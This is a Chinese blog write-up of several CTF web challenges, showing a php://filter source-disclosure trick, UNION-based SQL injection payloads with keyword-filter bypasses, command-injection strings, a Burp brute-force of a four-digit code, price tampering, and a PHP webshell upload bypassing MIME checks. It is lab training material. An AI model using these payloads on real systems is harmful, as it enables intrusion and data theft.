web题复现

已于 2024-03-24 09:45:07 修改
阅读量389 收藏 10
点赞数 9
文章标签: sql
于 2024-03-21 23:11:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82736056/article/details/136922319
版权

一个朴实的页面

 打开题目后发现无论在输入框怎么输入都无法输入成功,鼠标和键盘输入也都没有作用,也无法通过快捷键和鼠标查看源代码,最后通过网页的菜单栏成功查看了网页源代码。

 我们在源代码中发现了本题禁止了所有查看源代码的方法。

通过网页的提示“web拿到一个网站第一步应该怎么做”,我们想到拿御剑扫描一下这个网站,得到了含有robots协议的两个网址。

 点击第一个网址后得到了一个php文件。

我们将文件输入到地址栏中,得到了网页源代码。通过源代码我们可以知道本题屏蔽了base,我们可以将小写的base替换为大写的Base。

 输入构建以下语句将flag转换为base64编码进行查看。将得到的编码进行解码得到flag。

?G7=php://filter/convert.Base64-encode/resource=flag.php

斗宗强者恐怖如斯

点开题目后是一个登录页面,通过题目的提示得到用户名是admin,我们接着用弱口令进行尝试得到密码是admin123.成功登录后的界面是两个问号

我们尝试进行注入 ,输入id=1’,报错,说明存在注入点。

接着判断字段个数,输入,有回显,证明表中只存在3列。

?id=-1') union select 1,2,3--+

 ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

 爆出数据库名。接着爆出表名,但是报错了,通过报错信息可知information少了or

?id=-1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’xitif_sql’ --+


 我们进行修改,修改后,爆出表名,发现flag文件

?id=-1’) union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=’xitif_sql’ --+

接着进行爆表中的字段,得到flAg文件。?id=-1') union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag' --+

最后利用?id=-1') union select 1,2,group_concat(flAg) from xitif_sql.flag --+打开文件,得到flag。

 Rceeee

打开后是源代码,通过观察可知本题屏蔽了大量字符

通过构建?cmd=ls/|tee a.txt打开文件目录

因为本题屏蔽了cat flag 等字符所以我们用c\at fl*g代替,构建?cmd=c\at/fl*g|tee a.txt 来打开flag文件。

师姐的生日

由题目可知师姐的生日是四位数,首先利用bp进行抓包,导入字典进行爆破,师姐的生日为四位数,所以最大值和最小值都设置为4,从0000到9999进行爆破。

ddf71aded3ed4fd48a8716fa0b853215.png

爆破后得到师姐的生日为0326,将生日输入后得到本题的flag 。

5a951fb4a26d4df5b9f1daac0ce404d8.png008378e2cc414cfb8ea52e4b172c8504.png 云曦超市大甩卖

 打开题目后发现一共有几个商品,其中有flag,需要999999,但是自己只有1000,没有足够的钱去购买flag,我们先打开bp进行抓包,发现其中代码中有价格,我们可以将题目中的商品价格进行修改,使得我们能够买得起flag。将商品价格改为-9999,利用了逻辑漏洞,使我们越买东西钱越多,那样我们就可以买得起flag了。修改完代码后,我们再次购买几个物品,我们的钱就可以买flag了,购买flag后就得到了本题的flag。

1bcf2a5b377542b2bf97e5071bc88708.png82b5295236a14af1a21a739090ae6fc5.png

 Gentle_sister

打开题目后是一张图片,上面有一个点我看看,点击之后发现没有任何显示,查看网页源代码也是什么都没有,于是我们返回图片,查看图片的源代码,发现其中有一串代码

if(isset ($_GET['my_parameter'])) (
    $param_name = $_GETl'my_parameter'];
    if (preg_match("/[o-9]/", $my_parameter)){
        die ("error!");
    }
    if(intval ($my_parameter)){
    echo $flag;
    }

ea2ca1c5abd543e8b8c572ebc0bf42e0.png

输入paramenter[]1,即可得到本题的flag。

937a8cd41f444f2383d884c3ad40fed0.png

这都不做

由题目可知是一道文件上传类型的题,我们首先上传了一个包含一句话木马的php文件,结果显示application/octet-streaminvalid file type!jpg only!!通过搜索发现该文件时MIME型文件。

d306846d307843cf89f1b71aeb81e03f.png

 我们通过bp进行抓包,将文件类型改为image/jpeg.

d5371217bda9495a867ed4e79e58636b.png

 改完后继续上传文件,结果还是上传不了,通过搜索发现是服务器被设置为不允许通过文件URL访问PHP解析器

7609a9dade7143e4b0b70c73e729a7bf.png

我们继续修改,将PHP删除改为-,再次上传文件

001fab3b67034636be8d9076bb7d76b9.png

显示上传成功,问我们上传路径是什么

babf888ca28549cfa23e87f6e8de08c7.png

 我们在地址栏输入172.16.17.201:50142/upload/1.php,结果显示无法显示,得知上传路径错误,通过尝试发现文件上传中包含双写绕过

2401_82736056
关注
DASCTF-三月赛-web复现
weixin_45800126的博客
04-15 913
title: DASCTF 三月赛 web复现 date: 2021-04-07 15:04:52 tags: DASCTF BestDB 0x01 源码给了查询语句 $sql = "SELECT * FROM users WHERE id = '$query' OR username = \"$query\""; 过滤单引号,但没过滤双引号,所以选择闭合后面的用户名进行union查询 查表名 query=-1"/**/union/**/select/**/group_concat(table_na.
[CTF]SCTF2021 WEB复现(详细版)
Sapphire037的博客
01-09 4316
Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的,源码: package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != ""
ISCC web复现
m0_62422842的博客
06-05 1479
第一次参加ISCC线上赛,感觉题目质量还是挺好的,擂台赛都是大佬们的主场,向我这样的小白也只能学学新东西。在此总结做过的web题目以及相关知识
SWPUCTF2019web复现
bmth666的博客
04-05 1304
[SWPU2019]easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 后面发现还可以用-1'/**/group/**/by/**/22,'1,一样可以爆出为22列 查看数据库:-1'
2022安洵杯web复现
m0_62422842的博客
11-28 1785
个人觉得赛质量蛮好的,只是自己太菜了,花了很长时间都在琢磨第一道web,因为一些细节上的问导致一直解不出来。赛后就找师傅的wp重新去复现一下,总结自己的问,在此记录一下,以便日后复习。慢慢学习,慢慢积累。又是崇拜大师傅的一天~
XYCTF部分web题目复现
05-06
### XYCTF部分web题目复现 #### 一、PHP Web ezClass 题目解析 ##### 题目背景及分析 此的核心在于理解并利用PHP中的原生类特性,通过构造特定的请求来执行系统命令或获取敏感信息。 - **题目代码**: ```php ...
【MRCTF—Web】做+复现记录
Lemon's blog
04-27 1344
套娃 查看源码发现这一串代码, substr_count() 函数计算子串在字符串中出现的次数 $_SERVER['QUERY_STRING'] 例如: http://localhost/aaa/index.php?p=222&q=333 结果: $_SERVER['QUERY_STRING'] = "p=222&q=333"; 想绕过去就必须满足我们传入的参数没有_,而且得通...
安恒11月赛Web题目复现
0verWatch的博客
11-30 2402
考完网络安全跟算法就赶紧来复现一下题目,又学到了一波知识了23333,这次题目的质量贼好 手速要快 上一个月的原,不多说,直接在http头里面找到对应的password登陆以后直接就是关于页面上传的功能,这里的上传是服务器端的问 直接上传一个非php结尾的文件即可解析 然后可以直接输入相关命令获取flag不多说 好黑的黑名单 这个题目质量很好,至少我以前都没见过这种盲注,里面利用了bet...
sqlalchemy JSON 字段写入时中文序列化问
llc的博客
09-12 347
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
SQL(结构性查询语句)
2301_78693337的博客
09-11 470
以上就是今天要讲的内容,本文介绍了基础的SQL语法使用,而sql还提供了大量能使我们快速便捷地处理数据的函数和方法等着我们探索。
大数据-132 - Flink SQL 基本介绍 与 HelloWorld案例
永远好奇,无限进步!
09-12 2353
Flink SQL 是 Apache Flink 提供的一种高层次的查询语言接口,它基于 SQL 标准,为开发者提供了处理流式数据和批处理数据的能力。Flink SQL 允许用户使用标准 SQL 查询语言在数据流和数据表上执行复杂的操作,适用于多种应用场景,如实时分析、数据流处理、机器学习等。Flink SQL 的一大特是流处理和批处理的统一性。通过同一套 SQL 语法,用户可以同时处理静态数据(批处理)和动态数据(流处理)。这使得应用程序的开发更加简化,因为可以用相同的逻辑编写实时流数据处理和历史数据的
sqlserver常用的sql命令
2301_76664379的博客
09-11 713
备注:D 表示全备份,i 表示差异备份,L 表示日志备份。
金蝶云星空查询SQL
zhanzhibo的专栏
09-10 406
税率、仓库、部门、员工、供应商、客户、物料类别、物料查询、BOM查询、辅助资料:工程项目、辅助资料:产品服务、科目、核算维度、科目余额、未转采购订单的采购申请、采购订单未完结的:待接收的、
mysql DBA常用的sql
weixin_44550507的博客
09-12 731
DBA常用sql,方便性能优化
RocketMQ出现The broker does not support consumer to filter message by SQL92
山不见我,我自见山
09-12 301
然后通过rocketmq-console来查看,集群中的这个属性是否为true,为true就可以了。在使用RocketMQ使用SQL过滤消息的时候,出现下面错误。原因是我们的配置文件没有开启SQL过滤功能,我们需要在。接着我们重启namesrv与broker服务就解决问。配置文件中添加下面命令。
SQL创建索引加快查询速度的方法
大IT职男日志
09-11 538
进行SQL查询时候,如果数据庞大,查询速度会变得很慢,需要用到索引来加快速度。方法如下:一、创建索引方法1、使用CREATE INDEX 语句创建索引 查看索引:SHOW INDEX FROM 表名;创建索引:CREATE [UNIQUE | FULLTEXT] INDEX 索引名 ON 表名 (表字段,...) ;加参数 UNIQUE 增加唯一键索引,FULLTEXT 全文索引 不加普通索引;前缀索引:create index 索引名 ON 表名 (字段(前n个字符));删除索引:DROP IN
漏洞复现-泛微-E-Cology-SQL
无问社区的博客
09-12 443
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology系统HrmService前台存在SQL注入漏洞。。影响范围:泛微E-Cology9 < 10.65.0建议升级最新版本,已经修复。
postgresql-patroni高可用安装部署
最新发布
weixin_73350116的博客
09-12 996
patroni+etcd,算是目前比较主流的PG高可用搭配了。patroni都出4.0版本了,一直没时间,断断续续写了好久,最近有人问到,那就当作一个笔记发表吧,自行搭建一个测试库做测试吧。来来回回改了好几遍。文中可能不妨地方没有同步修改的遗漏
2024云曦考核Web复现:密码破解与购物漏洞利用
"本文介绍了24年云曦考核中关于Web方向的部分题目,涉及Web安全及Burp Suite工具的使用,特别是 Intruder 模块在密码爆破和漏洞利用中的应用。" 在这次云曦考核的Web方向题目中,首先是一个与“师姐的生日”相关的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值